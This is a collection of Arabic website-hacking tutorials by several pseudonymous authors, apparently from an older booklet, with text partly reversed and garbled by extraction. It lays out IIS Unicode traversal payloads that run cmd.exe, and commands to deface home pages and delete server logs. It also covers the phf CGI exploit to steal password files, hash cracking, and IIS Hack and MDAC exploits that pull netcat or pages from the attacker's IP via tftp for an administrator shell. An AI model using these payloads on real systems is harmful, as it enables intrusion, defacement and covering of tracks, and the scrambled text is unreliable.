تعلم االختراق

DJ KING:للكاتب

يعتبر ھذا الموضوع و الذي انت على وشك قرائته من اخطر المواضیع التي

واضیع التي كتبت على كتبھا في حیاتي و ھي ايضا في رايي من اقوى الم االطالق

انما بسبب شمولیة الموضوع و تعدد االفكار فیه) حاشاهللا ( لیس لقدرة في

... بعد قرائة ھذا الموضوع ستتكون عندك فكره قويه جدا حول اختراق المواقع لیس بالضروره ان تخترق مواقع بعد قرائة ھذا الموضوع انما ستفھم ما يحدث

من حولك ضا معظم اسالیب االختراقو تفھم اي

:معرفة نظام الموقع : اوال

-- -- -- --- -- --- -- -- -- --- -- -- --- لذا .. البد من معرفة نظام الموقع حتى تحدد مسارك في خطوات االختراق فالبد من معرفة النظام و يمكن ھذا عن طريق اشكال كثییره اذكر منھا

:اھم و ابسط طرق الشھییر netcraft عن طريق موقع - بعض البرامج المخصصه لذلك- telnet عن طريق محاولة االتصال بالموقع من التلنت - و بعض البورتات port scan و ممكن ايضا عن طريق عمل سكان على الموقع -

المفتوحه تدل على انظمه معینه

:اسھل ھذه الطرق ھي االولى في رايي تضع اسم الموقع المراد whats/mco.netcraft.www://http: وصلة الموقع

لتحصل على النتیجهenterفحصه ثم

:امثله com is running Apache on Linux or.xxx.The Site www running IISx on

Xp/2000/x9windows/NT

308

)على االقل ( و من ھنا نالحظ انه ھناك نتیجتین :في المثال االول

Web Server= Apache ) اللغة العربیه الملقم ب( s Os'Server= Linux ) نظام الشتغیل(

:في المثال الثاني Web= IIS Server s Os'Server= xp /2000/NT/Windows

:ھناك انظمه اخرى كثییره و ملقمات اخرى ايضا

OpenBSD, ) My BaBe(FreeBSD , SunOS , , NetBSD: انظمه اخرى مثل IRIX, AIX

NetScape Enterprise: مثل ملقمات اخرى

معرفة بعض الخدمات على السیرفر com.Netcraftكما يمكن ايضا من موقع .... الخ FrontPage و PHPمثل نسخة ال

...و االن و بعد ان توصلنا الي نتائج معینه نريد ان نباشر العمل

لینكس باذن و ساوضح میفیة التفكیر و خطوات االختراق في حالتي الويندوز و ال اهللا

Windows xp/2000/x9/NTماذا لو اكتشفت ان الموقع يعمل على نظام ويندوز

؟ -- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- ---

- --- -- -- --- :اذا البد من التفكییر في االختراق من عدة امور

1 .IIS Unicodesثیییره جدا و متنوعه على جمیع اصدارات ال و ھي كIIS 2 .FTP Server و ھي ثغرات ال FTP 3.Sharing Filesالمشاركه بالملفات 4.FrontPage

:نبدا من االسھل تحققا فاالصعب FTP ... بما ان معظم قرائ ھذا الموضوع من مستخدمین الويندوز فمعظم

العملیاتكالمي سیكون حول الويندوز في تنفیذ start<run <n hostname-ftpاذھب الى

309

مع السیرفر و يقولك عن Connectionو من ثم ستفتح الدوس و تعمل كونكت الموجوده على السیرفرFTP serverنسخة ال

بنمتھى البساطه ممكن التاكد من ھذه النسخه فیھا ثغرات دون استخدام اي :برامج من محركات البحث الشھیره مثل

com.google, securityfocus , packetstrom الخ .. Sharing Folders:

و ھذا يمكن الكشف عنه عن طريق NetBios== <139Portعن طريق ال Port Scanner اي برنامج سیوفي الغرض مثل 139 على البورت رقم

SuperScanالخ start<run<\\ip addressو بعدھا تحاول تعمل كونكت مع السیرفر عن طريق

)خلیھا على اهللا ( ممكنا تكون فیه كلمة سر و ممكن ال

FrontPageالفرونت بیج - -- -- --- -- --- -- -- -- --- -- -- ---

:ھناك ثغرات كثییره يمكن استغاللھا منه اذكر منھا اشھر الثغرات pw.service/pvt_vti_/com.xxx.www://http

مة السرو منھا نحصل على كلمة المرور و كل و الذي يمكن كسره ببرامج كثییره اشھرھا DESكلمة السر مشفره بمقیاس

John The Ripper و الذي يعمل في بیئتي الويندوز و ال *nix

IISاخییرا و لیس اخرا -- --- -- --- -- -- -- --- -- -- ---

IIS = Inetnet Information Service codesUniو نستخدم ثغراته المعروفه بالیونیكودز

:)و ھي كثیییییییییییییییییره جدا و انا اعني ما اقول

:مثل ****

c/?exe.cmd/32system/winnt../c1%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../v9%0c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../af%0c/..%scripts/com.xxxx.www://httpc+dir+:\

310

c/?exe.cmd/32system/winnt../qf%0c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../s8%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../c9%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../pc%1c/..%scripts/com.xxxx.www://http

dir++ c:\ /

syst/winnt../63%35%25../..%63%35%25../..%63%35%25/..%msadcc+dir+c/?exe.cmd/32em:\ /

+c/?exe.cmd/32system/cwinnt255..%c255..%c255..%c255/..%MSADCc+dir:\ /

exe.cmd/32system/cwinnt35%%..c35..%%c35..%%c35/..%%MSADCc+dir+c/?:\ /

syst/winnt63%35..%%63%35..%%63%35..%%63%35/..%%MSADCc+dir+c/?exe.cmd/32em:\ /

63%35%25..%63%35%25..%63%35%25..%63%35%25/..%MSADCc+dir+c/?exe.cmd/32system/winnt:\ /_

cm/32ystems/winnt../c255..%c255..%c255..%c255..%c255/..%bin_vtic+dir+c/?exe.d:\ /_3system/winnt../c35..%%c35..%%c35..%%c35..%%c35/..%%bin_vtic+dir+c/?exe.cmd/2:\ /_6%35..%%63%35..%%63%35..%%63%35..%%63%35/..%%bin_vtic+dir+c/?exe.cmd/32system/winnt../3:\ /_..63%35%25..%63%35%25..%63%35%25..%63%35%25/..%bin_vti

311

c+dir+c/?exe.cmd/32system/winnt../63%35%25%:\ /c+dir+c/?exe.cmd/32system/cwinnt255..%c255..%c255/..%PBServer:\ /

dir+c/?exe.cmd/32system/cwinnt35..%%c35..%%c35/..%%PBServerc+:\ /.cmd/32system/winnt63%35..%%63%35..%%63%35/..%%PBServerc+dir+c/?exe:\ /3system/winnt63%35%25..%63%35%25..%63%35%25/..%rPBServec+dir+c/?exe.cmd/2:\ /c+dir+c/?exe.cmd/32system/cwinnt255..%c255..%c255/..%Rpc:\ /c+dir+c/?exe.cmd/32system/cwinnt35..%%c35..%%c35/..%%Rpc:\ //?exe.cmd/32system/winnt63%35..%%63%35..%%63%35/..%%Rpcc+dir+c:\ /

cm/32system/winnt63%35%25..%63%35%25..%63%35%25/..%Rpcc+dir+c/?exe.d:\ /_

cm/32system/winnt../c255..%c255..%c255..%c255..%c255/..%bin_vtic+dir+c/?exe.d:\ /_3system/winnt../c35..%%c35..%%c35..%%c35..%%c35/..%%bin_vtic+dir+c/?exe.cmd/2:\ /_6%35..%%63%35..%%63%35..%%63%35%%..63%35/..%%bin_vtic+dir+c/?exe.cmd/32system/winnt../3:\ /_..63%35%25..%63%35%25..%63%35%25..%63%35%25/..%bin_vtic+dir+c/?exe.cmd/32system/winnt../63%35%25%:\ /

syste/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%samples

312

c+dir+c/?exe.cmd/32m:\ /-cgi/32system/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%binc+dir+c/?exe.cmd:\ /

syste/fwinnt252..%f252..%f252..%f252..%f252..%f252/..%iisadmpwdc+dir+c/?exe.cmd/32m:\ /_

system/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%cnf_vtic+dir+c/?exe.cmd/32:\ /

sys/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%adsamplesc+dir+c/?exe.cmd/32tem:\ /



cm/32system/AFwinnt%0C..%AF%0C..%AF%0C..%AF%0C/..%scriptsc+dir+c/?exe.d:\ /

di+c/?exe.cmd/32system/fwinnt252..%f252..%f252..%f252/..%scriptsc+r:\ /c+dir+c/?exe.cmd/32system/cwinnt255..%c255/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../c1%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../v9%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../af%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../qf%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../s8%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../c9%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../pc%1c/..%scripts:\ /

313

/?exe.cmd/32system/winnt../af%0c../..%af%0c../..%af%0c/..%msadcc+dir+c:\ /_/?exe.cmd/32system/winnt../af%0c../..%af%0c../..%af%0c/..%bin_vtic+dir+c:\

منھا% 1.0ه ال يساوي و ثغرات اخى كثییییییییییییییییییییییره جدا ما كتب و سابدا حاال طريقه استغالل ھذه الثغرات بكذى طريقه

exe.cmd يتم تطبیق ھذه الثغرات مباشرة من المتصفح مستغلین ملف ال -

اتنفیذ اوامرنا :مثال للثغره و تطبیق االوامر

bin_vti_/com.xxxx.www://http

%../c+dir+c/?exe.dcm/32system/winnt../af%0c../..%af%0c:\

:امر انشاء دلیل جديد - --- -- --- -- -- -- --- -- -- ---

bin_vti_/com.xxxx.www://http %../DJ\:c+md+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

:امر الغاء دلیل

-- -- -- --- -- -- --- bin_vti_/com.xxxx.www://http

%../DJ\:c+rd+c/?exe.dcm/32system/winnt../af%0c../..%af%0c

:االمر المستخدم للنسخ- -- -- --- -- --- -- -- -- --- -- -- ---

bin_vti_/com.xxxx.www://http %../syste\winnt\:c+copy+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

exe.DJ\scripts\inetpub\:c+exe.cmd\32m

314

االمر المستخدم للحذف

- -- --- -- --- -- -- -- --- -- -- ---- - bin_vti_/com.xxxx.www://http

%../ww\inetpub\:c+md+c/?exe.cmd/32system/winnt../af%0c../..%af%0casp.index\wroot

:االمر المستخدم لتغییر مسمى الملف

-- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- bin_vti_/com.xxxx.www://http

%../DJK+htm.DJ\:c+ren+c/?exe.cmd/32system/twinn../af%0c../..%af%0chtm.ING

المر المستخدم لرؤية محتويات الملف___________________________


%../htm.index\:c+type+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

:االمر المستخدم للكتابة داخل أي ملف

-- --- -- -- ---- -- --- -- --- -- -- -- --- -- -- --- -- --- -- --


+BY+HACKED+echo+c/?exe.cmd/32system/winnt../af%0c../..%af%0cKING+DJ+<+txt.DJ\:c

:ملحوظه

-- --- -- -- --- msadc_ , , bin _vti: قد نحتاج الى تغییر مسمى الدلیل بحیث يكون

bin-cgi, samples , scripts , min ad_vit, _iisadmpwd

315

:و االن لتغییر الصفحه االولى للومقع البد من

echo الكتابه على الصفحه الرئیسیه مستخدمین االمر - TFTP برفع صفحتك الشخصیه بواسطة برنامج ال -

echo باستخدام االمر htm.indexطريقة الكتابه على الملف الرئیسي للموقع :

-- -- --- -- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- ----- -- -- ---

بھذا الشكل على scripts الي مجلد exe.cmdمبدئیا البد من نسخ ملف :سبیل المثال


%../syste\nntwi\:c+copy+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

exe.DJ\scripts\inetpub\:c+exe.cmd\32m

:و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده c+dir+c/exe.DJ/scripts/com.xxx.www://http:\

: بالشكل التالي echoو بعدھا يمكن تنفیذ االمر AB+EL+BY+HACKED+echo+c/?exe.1CMD/scripts/com.xxx.www://http

Palestine+Live+Long+_+com.hotmail@110_abcd++TAR+<+htm.2\Lymphasite\:E

:ملحوظات ھامه*

-- --- -- -- -- --- -- -- --- فممكن htm.index لیس بالضروره ان يكون االندكس الرئسیه للموقع اسمھا -

:ان تكون html.default, html .index , asp.default, htm .defaultد اوال من فعلیك التاك

ھو االفتراضي ان يكون الرئیسيhtm.indexاسم الملف و لكن لذا فالبد من wwwroot ممكن ان يكون الملف الرئیسي في مجلد غیر ال -

...البحث

316

:TFTPطريقة استخدام رفع الصفحه بواسطة برنامج

--- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- یتم تبطیقھا ايضا بالثغره التي اقترضتھا اعلىس فھو صغیر و مجانيtftp حمل برنامج ال - \:c ضعه في ال - \:c ضع االندكس او صفحتك المراد رفعھا في ايضا ال - : شغل البرنامج و اجعله جاھزا ثم نفذ االمر التالي -

bin_vti_/com.xxxx.www://http %../-+"exe.tftp+c/?exe.cmd/32system/winnt./.af%0c../..%af%0chtm.index\wwwroot\inetpub\:C+htm.index+GET+y.y.y.y"+i

:حیث -- -- ---

exe.tftpھو البرنامج المستخدم للرفع "i- "برامیتر y.y.y.yرقم االيبي الخاص بك

ھو htm.index\wwwroot\inetpub\:C.. و الباقي على ما اظن ال يحتاج توضیح الوضع االفتراضي كما ذكرت لكن ممكن ان يختلف من موقع الخر فالبد من

التاكد اوال

:و اخیرا لمسح اللوق


system/winnt:/c+del+c/?exe.cmd/32system/winnt../af%0c../..%af%0clog/*.logfiles/32

IISز و ال ھذا تقريبا كل ما يخص سیرفرات الويندو

Apache on linux: اما بالنسبه للمواقع التي سیرفراتھا على سبیل المثال

ftp serverفطريقة التفكییر ستتغیر كلیا ماعدا االختراق عن طريق ال

317

لھا ثغرات يمكن استغاللھاftpفمعظم نسخ ال

:ملحوظه - --- -- -- ---

اذا كان على جھازك او nix*م عند اختراق مثل ھذه المواقع البد من استخدا و انت متصل من الويندوز ھذا حسب ايمكانیاتك المتاحهUnix Shellمن

بالنسبه للیونكس شیل التحاول ابدا استخدام شیالت مجانیه فلن تفلح و سیتم الغاء اشتراكك

بعد ما توصلت لموقع معین ووجدث ثغره معینه طريقة تطبیقھا يكون بالطريقه

)source code ھي exploite حالة ان في( ھذه : فتطبیقھا عادة ما يكون بھذا الشكل c.exploitالملف سیكون

c.o exploit exploite-gcc : رقم االيبي او الھوست نیم مثل victimحیث ال /. exploit victimو من ثم

com.xxx.www rootو بدھا يمكن الحصول على

to / cdكانك على السیرفر و من ثم قم بعمل االمر للتاكد من مpwdنفذ االمر make sure u go to the root place

قومو باستخدام االمر .. للذين يحبون توخذ الحذر قبل تغییر الصفحه الرئیسیه whoلمعرفة من معك حالیا على السیرفر

يمكن ذلك عن html.indexاذا كنت لوحدك باشر عملك علطول و ابحث عن ال :ريق االمر ط

html.name index-/ find ھذا سیقوم بالبحث في كل السیرفر عن اسم ھذا الملف و بعد الحصول على

htroot, httpd, htdocs ,: الملف المراد و غالبا ما يكون في ادى ھذه المجلدات and www, webdocs

او تستخدم ftpاما ان تحمل االندكس الخاصه بك من اي مكان عن طريق :طريقتي المفضله و ھي

cat or pico html.index حیث ان ال cat or pico ھما text editors و من ثم قم بتاع صفحتك انت و html بتاع الصفحه و الصق كود ال htmlبمسح كود ال

اخرجsaveاعمل lolو بالشفا كده الطبخه استوت

echo: ا الشكل و ھو في منتھى السھول بھذechoاو انك تستخد االمر whatever" "<file مثال :HACKED BY DJ KING"echo "<html.index

318

:)و انتھى الموضوع :لمسح اللوق دور على كل فیالت اللوق باستخدام ھذه االوامر

name log-/ find name logs-/ find

name logfiles-/ find find / -name klogd

name syslogd-/ find rf-rm / log/folder ثم امسحھم باالمر و من

عملیة االختراق لیست صعبه كما يظن البعض انما تحتاج السلوب صحیح في

و تحتاج لمتابعة احدث الثغرات و كیفیة الحصول علیھا.. التفكیر :مواقع بھا ارشیف ثغرات

za.co.hack com.securify.packetstorm com.securityfocus

ارجو ان اكون وفقت في ھذا الشرح ... كثییره لكن ھذه اشھرھم و مواقع اخرى ..االعلى نسبیا من المبسط

319

اختراق المواقع kondor :للكاتب

إختراق المواقع ماھو اال شئ بسیط ، نعم بسیط ولكن في حاله واحده وھي أن تتعرف على نظام التشغیل لسیرفر وھي مسأله في غايه البساطه واألمر

ان تكون عالما بالثغرات الموجوده فیه ، وتكون المسأله صعبه إذا كنت الثاني تريد تريد إختراق مواقع كبیره ومشھوره ولھا ھیبه وحمايه عالیه حیث أنك في

ھذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لھذا ه في ھذا الموقع الموقع ألن وبالتأكید قد رقعت وعلیك أن تفكر في إكتشاف ثغر

لتخترقه وھذه الناحیه لن أتحدث عنھا ألني ال أعرفھا ، ولكن سوف نتحدث عن البیسك سیرفر ھو السیرفر الخادم ألكثر المواقع العربیه وھو سیرفر بسیط في

,,, الحمايه إلختراق ھذا النوع من السیرفرات علیك التعرف على نظام التشغیل له ويتم

عرف علیه ذلك من عده طريق لت مثال نريد اختراق الموقع

com.kondor.www وھذا موقع لیس مجاني بل ھو نطاق له سیرفره ورقم آي بي ثابت وھذا شئ

معلوم لدى الجمیعنرسل رساله الى عنوان بريدي خاطئ الى ھذا السیرفر وسوف يرد علیك بأن

ھذا البريد غیر موجود في الموقع والبريد مثال ھو com.kondor@erhhgguutujfk

وھو بالفعل غیر موجود في الموقع عنوان بريد باإلسم ھذا ، من خالل الرساله التي وصلتك تخبركبأن عنوان البريد ھذا غیر موجود تستطیع التعرف من خاللھا

على نظام الموقع ، وھذه واحده من الطرق عن الثغرات له ثانیا علیك اآلن وبعد معرفه نظام التشغیل لھذا الموقع أن تبحث

//////////// ////////////

مالحظه مھمه //////////// ////////////

قد يخترق أحد المواقع ويكون السبب لیس نظام التشغیل ، بل يكون أحد البرامج المثبته علیه مثل ملفات سي حي آي وقد تستخدم لجلب ملف

في إصدارات وھناك حادثه مثل ھذه passwdالباسورد المسمى دائما بـ WWWThreads للمنتديات

320

/////////////////////////////////////////////////

لنفرض انك تبي تخترق سیرفر بسیط وقلیل األمن وھذا النوع منتشر بكثره

بكثره نعم بكثره ، عندھا سوف يكون إختراق ھذا النوع والحصول على الباسورد ايه البساطه والداعي بعد ان تخترق بأن فايل امر في غايه البساطه نعم في غ

كیف ؟ ان ترد علیه بأن العملیه معقده .. تقول لمن يطلب منك جواب لسؤال وھذا الرد كاذب

مثال أدخل على السیرفر في وضع التخفي anonymously )) إستخدم التلنت في ھذه الخطوه((

وانظر الى المجلد المسمى بـ etc

وأطلب الملفpasswd

الملف يحتوي على كلم السر ! ھي عملیه بسیطه ولكن قف ... ھل رأيت الخاصه بالموقع وغسماء المستخدمین للسیرفر وكلماتھم السريه ولكن

كلماتھم السريه تكون مشفره طريقه أخرى إلختراق ھذا النوع من السیرفرات

أبحث في الموقع المستھدف من خالل المتصفح عن يا ترى وجود سي جي يآ

عند توفره أطلب الملف التاليx=Qalias?phf/bin-cgi /passwd/etc/cat /bin

مثال عنوان الموقع ھو com.kondor.www

نكتب ھكذاx=Qalias?phf/bin-cgi/com.kondor.www /passwd/etc/cat /bin

عندھا سوف يرسل لك الملف passwd

لھم دخول السیرفر وسوف يكون في الملف إسماء وكلمات السر المرخص ولكن قف ھناك أمر حیرني كثیرا وجاب لي الصداع وحیث اني ذھبت لتصمیم برامج لفك التشفیر عن كلمات السر فھي مشفره وأنتھى األمر بي البرنامج

!الذي صمم على يد أحدھم

321

اآلن سوف أضع أسئله وأجوبه لتسھل الفھم

ما الملف: سpasswd

ن األشیاء المسموح عرضھا ؟ وھل الحصول علیھا يعتبر م الملف : ج

passwd يحتوي كلمات السر وأسماء المستخدمین المسموح لھم دخول جھاز السیرفر

وھو غیر مسموح بعرضه ولكن ھناك ثغرات وطرق ذكرنا بعضھا أو القلیل منا وسوف نذكر أكثر ، المھم عند حصولك على الملف سوف تشاھد مكتوب فیه

ھكذا مثال CodeSources -شفرة

ksh/bin):/:/0000(Admin-:0000:10:x:root 0000(Admin-:0000:11:x:daemon:/:(

bin/usr):/0000(Admin-:0000:22:x:bin: uid::6000160001:x:nobody:nls/net/usr:/Network Admin::437:x:listen

uid noaccess::6000260002:x:noaccess:/:nobody:/: :4101:x:ftp:

ftp/home/export:/FTPUser: kondor/home/export:/RichardClark:4:kd6745rte&yu:kondor

إحنا علینا من السطر ھذا kondor/home/export:/RichardClark:4:kd6745rte&yu:kondor

ولتفسیره نقول بأن إسم المستخدم ھو

kondor حط خطین تحت كلمه مشفره ھي .. وكلمه السر المشفره

kd5674rte&yu وايضا

201: User number 4: Group Number

Richard Clark): usually(Real Name rrc/home/export: /Home Directory

ksh/bin: /Type of Shell passwdاآلن فھمنا ماذ يعني السطر ھذا السطر من الملف

322

kondor/home/export:/RichardClark:4:kd6745rte&yu:kondor

تعرف من ھذه شئ حاولت أنcsh/bin:/:/admin sign in :00:I9m7ufcNtKNYj:sysadm : sh/sbin:/admin:/Regular Admin login

bin:/Admin ::22:*:bin: src/usr:/Admin ::33:*:sys: sh/sbin:/adm/usr:/Admin ::44:*:adm

Daemon Login for daemons needing: :11:*:daemon 34:65565534:*:nobody:/:: ftp/var:/FTP guest login::3939:*:ftp: sh/sbin:/dtodd/home:/John Todd::100101:tKzOI8sav1yYn:dtodd

restsh/bin/usr:/joetest/home::/:100:1022HfEEIs6IeSH0:joetest ھل اي ثغره تنجح ؟ : س ھل ال طبعا ، البد ان تكون عارفا ألي شئ ھذه الثغره وألي نظام تشغیل و: ج

يلزم أن يكون مع نظام التشغیل برنامج آخر لیتم الدخول على السیرفر أو على الروت ، وكل ھذه المعلومات البد من توفرھا

يعمل على نظام لینكس net.alsahatمثال الموقع وقد يكون لثغره أن سبق ورقعت

ھل يختلف تشفیر كلمه السر من نظام آلخر ؟ : س ... ھذا شئ أكید : ج

ھل ھناك برامج مخصصه لكلمات السر لكل نظام ؟ : س) passwd(نعم ، مثال برنامجي المفضل لكسر شفرات الكلمات السريه : ج

ولكن لألسف أنا ال أملكه اآلن وھناك برنامج آخر قد Bruteلنظام يونكس ھو 41Cracker Jack.يكون أفضل من سابقه وھو

إعذروني لن كان كالمي مو مرتب عشان كذا بعید أكتب لكم بتعمق أكثر والكالم ... كل الكالم واهللا مو مرتب ش

اللي فوق ھذا مجرد مقدمه بكتب بالعامیه ازين لي ولكم

كیف يتم :: مو الزم تعرف الكالم الي سبق ذكرته لكن إفھم منه جواب السؤال فقط::

===نبداء من ھنا وبعمق ===

323

عرفنا ان الملف passwd file)آلن بإسم ملف الباسورد سوف نسمیه من ا(

يحتوي على إسماء المستخدمین المرخص لھم الدخول الى السیرفر وكلماتھم السريه وعرفنا أيضا أنھا مشفره ولكن ضع كل تفكیره في الحصول على ملف

الباسورد وأترك كیفت كسر التشفیر في النھايه فھي تعتبر بسیطه تمام ,,,, فمتو كل اللي راح

ستغالل الثغرات إالثغرات ھي حفر وھفوات في السفت وير فقط وتمكن ,,, اوال ما ھي الثغرات

أي شخص من الحصول على ماعلمومات أو نشر فیروسات من خالل ھذه الثغره

من ضمن ھذه الثغرات ، ثغره سبق وذكرتھا لكم في ھذا المقال وھي في ملفات السي جي آي واستخدمناھا إلختراق الموقع

com.kondor.www ونورد عنھا اآلن تفاصیل

تسمى ھذه الثغره األمنیه بـ PHF

إذا (ومعظم السیرفرات تمتلك ھذه الثغره والى اآلن لم يتم رقعھا مع األسف إذا نجحت ھذه الثغره فسوف يعرض لك ملف ) !:! وجد عنده سي جي آي فقط

الباسورد ، زي ھذا مثال

Sources Code -شفرة

ksh/bin):/:/0000(Admin-:0000:10:x:troo 0000(Admin-:0000:11:x:daemon:/:(

bin/usr):/0000(Admin-:0000:22:x:bin: uid::6000160001:x:nobody:nls/net/usr:/Network Admin::437:x:listen

uid noaccess::6000260002:x:noaccess:/:nobody:/: :4101:x:ftp: pft/home/export:/FTPUser:

kondor/home/export:/RichardClark:4:kd6745rte&yu:kondor

لووول) كتابه سابقا ھكذا سابقن أفضل (كما ذكرنا سابقن أحفظ الملف في تكست او مستند نص عشان تسوي له عملیات لكسر

التشفیر

324

FTP Passwd

بعض السیرفرات تحفظ ملف الباسورد في اإلف تي بي نفسه ، أي تستطیع لى حد بعید أن تحصل على ملف الباسورد من خالل دخولك في وصع مخفي ا

anonymous logins والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الھدف

المحدد ، غستخدم احد ھذه البرامج لھمل ذلك WS FTP or CuteFTP

وبعد ماتدخل بالوضع الخفي راح تجیك لسته أو قائمه منھاإختر

etc وراح يعرض لك عدد قلیل من الملفات مثل ھذا

"passwd, group" وملف الباسورد مو شرط يكون إسمه

passwd المھم أنت أسحبه وإفتحه ولو شفت إسم مثل .. ممكن يكون غیر كذا

"bin, ftplogin, nobody, FTP, daemon, root " وقد رمز آخر مثل عالمه * وإذا لقیت بالقرب من ھذه الكلمات رمز نجمه كھذه

إكس فقط ، لن ينفعك اإلستعانه بأحد الكراكر ولكن كل ماعلیك أن تتعقب الباسورد ويجب ان تبحث لحل لھذه المشكله فأنا حتى تحصل على مثل ھذا

"restsh/bin/usr:/joetest/home::/:100:1022HfEEIs6IeSH0:joetest" سر او حاول عن طريق البرامج الذي واآلن إستعن بأحد الكراكر لكسر كلمة ال

ذكرتھا لك سابقن

ماھو إسم المستخد ھنا وماھي كلمة السر المشفره ؟ : س .... !:! جاوب أنت

التعقب لملف الباسورد

اآلن وبعد أن حصلت على مثل ھذا "restsh/bin/usr:/joetest/home::/:100102:*:joetest"

فأنت اآلن تملك dshadowed passw

فھذا يتدلى في نظام التشفیل ولكن الـpasswd file

325

والملف ) ال داعي لتعمق اكثر (يختلف passwd file

xأو * ھو الذي نجد كلمة السر فیه مشفره ولیست رمز واحد مثل و الـ

shadow file يكون مكان كلمة السر نجمه أو رمز

وأنا الى اآلن لست متأكد من ھذه النقطه تعبت من الكتابه ،، اتمنى أنكم طلعتو بفايده انا الحین

326

IISالدلیل الكامل الختراق سیرفرات

X-DeMoN- X:للكاتب

-- -- -- --- -: مقدمة

-- -- -- --- حیث تشكل النسبة االكبر المستخدمة IISيعلم الجمیع مدى انتشار سیرفرات

..في تشغیل مواقع االنترنت لذا قررت القیام .. االمنیة لھذه السیرفرات ويعلم الجمیع مدى ضعف الناحیة

.بجمع اشھر ثغرات ھذا النوع مع توضیح كیفیة عملھا

-- -- -- --- -: مالحظة -- -- -- ---

وجمیعھا 05IIS. و 04IIS.معظم الطرق الموجودة ھنا تعمل على سیرفرات )) .يعني من خالل المتصفح ((80تعتمد على البورت

- -- --- -- -- ---

-: بات المتطل- -- --- -- -- ---

1 - Scanner-CGI أنا افضل .. جیدWhisker) يمكنك تنزيله من ھذا الموقع :rfp/net.wiretrip.www(

: يمكنك تنزيله من الموقع ( اكتیف بیرل لتشغیل ملفات البیرل - 2com.activestate.www://http/(

..IISاباتشي او ) اي نوع( ويب سیرفر - 3 # !Game Starts#

327

-- -- -- --- -- -- ---

exe.IIS Hack : - -- -- -- --- -- -- ---

ثغرة امنیة تسمح لك بتحمیل نسخه eEyeاكتشف خبراء االمن في شركة ..80لھا تنصت على المنفذ وجعexe.ncذكیة من

.Administrator مع امتیازات exe.cmdeوھذا سیعطیك سطر اوامر من الموقع exe.IIS Hack و exe.NCبامكانك انزال

com.technotronic.www://http/. ..یذ الثغرة ويجب تشغیل ويب سیرفر في جھازك قبل تنف

في ( وضعھا في الدلیل الرئیسي للويب سیرفر لديك exe.ncقم بنسخ اداة .wwwroot الدلیل IISوفي ) Htdocsاباتشي

:exe.IISHackثم قم بتشغیل c:\<exe.iishack com.target.www://http/ 80 exe.ncx/IP_your :عد اتمام الخطوة السابقة بنجاح وبc:\<nc com.target.www://http/ وستجد امامك eGG SheLL

اذا لم يتم تركیب (( فقط 04IIS.تعمل ھذه الثغرة على سیرفرات : مالحظة )) .الرقعه

do hey common you must be, you want me to explain what to do next

kidding ...hehe....

- -- -- -- --- -- -- --- RDS= MDAC : -

- -- -- -- --- -- -- --- من المواقع تعاني منھا % 40لكني ما زلت ارى ان (اعتقد انھا ثغرة قديمة قلیال

.. .. تسمح لك ھذه الثغرة بتشغیل اوامرك على النظام الھدف بشكل محلي

.. اي بصالحیات مدير النظام SYSTEMفتك مستخدم سیتم تشغیل وامرك بص ..على العموم اذا اردت معرفة اذا ما كان النظام مصابا بھذه الثغرة ام ال

328

/c:\<2w -nw -nc com.host.www://http: قم اوال باالتصال بالنظام الھدف GET/ dll HTTP.msadcs/msadc : ثم قم بارسال االمر80

اذا لم يتم (( فھذا يعني ان النظام مصاب varg_x/application: فإذا كان الرد )) ..ترقیعه

: بامكانك ايجاد سكربتات بیرل تسھل علیك العمل في ھذا الموقع rfp/net.wiretrip.www v pl .2 msadc-pl .acmd

c:\ <com.h host-pl .mdac c/cmd (Please type the NT commandline you want to run n\):assumed c/cmd

echo hacked by me: إذا اردت تغییر الصفحه الرئیسیة ما علیك اال تنفیذ االمر hehe < htm.index\wwwroot\inetpub\:C

s Swiss knife 'Hackerعلى الموقع بامكاننا تحمیل وإذا أردنا احكام السیطرة Army اقصد exe.Nc بواسطة ھذا االمر :

%systemroot%&&exe.i YourIP GET nc-tftp &&del ftptmp &&r -attrib exe.nc&&exe.e cmd-t -80 p -l -exe .nc ))قم بقراءة االمر من الیسار الى الیمین لتتمكن من قراءته جیدا ((

وستجد سطر اوامر مع 80قم باالتصال بالنظام الھدف على المنفذ بعدھا .Administratorامتیازات

- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- --- asp.Codebrws & asp.Showcode: - يأتي ASP الملفان عبارة عن قاريء ملفات --- -- -- --- -- -- -- --- -- --- -- -- --- -- -- -- -

..مل افتراضیا بل يجب على مدير النظام تفعیله ولكنه ال يأتي محIISمع فإذا كانت ھذه الخدمة مفعلة ستسفید منھا كثیرا قھي تسمح لك بقراءة اي

)) .اعني رؤية المصدر ((asp.ملف )) :اذا كان النظام مصابا (( باستخدام ھذا االمر ستحصل على ملف السام

